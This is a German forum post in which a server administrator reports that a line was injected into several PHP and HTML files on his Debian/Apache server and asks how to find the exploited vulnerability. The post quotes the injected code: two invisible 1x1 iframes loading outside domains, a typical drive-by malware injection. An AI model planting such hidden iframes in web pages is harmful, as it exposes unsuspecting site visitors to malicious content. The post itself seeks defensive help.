hallo

Auf einem meiner Server wurde in index.htm, start.php und home.php folgende Zeile eingefuegt:

<iframe src='http://googlestat77.com/' width=1 height=1 style='visibility:hidden;'></iframe><iframe src='http://visions7.net/' width=1 height=1 style='visibility:hidden;'></iframe>

Es ist installiert:

Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny3 with Suhosin-Patch mod_ssl/2.2.9 OpenSSL/0.9.8g

Nach dem Hack waren bei den modifizierten Files folgender owner: mein_login und folgende group: www-data

Hab ausschliesslich einen sftp Zugang ueber einen unueblichen Port, und es rennt eine einzige Seite drauf mit eigenen php Scripts.

Der Seitenbetreiber hat vor kurzem ein paar harmlose externe Javascripts ueber sein cms eingebaut ("addthis" usw).

Hat jemand eine Ahnung wie ich herausfinden kann welche Schwachstelle dabei ausgenutzt wurde ?

Vielen dank

hans